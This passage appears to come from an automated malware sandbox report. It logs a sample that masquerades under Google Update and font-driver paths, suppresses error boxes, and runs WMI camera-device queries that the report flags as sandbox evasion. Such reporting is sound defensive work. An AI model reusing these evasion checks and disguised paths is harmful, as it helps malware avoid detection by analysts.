                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
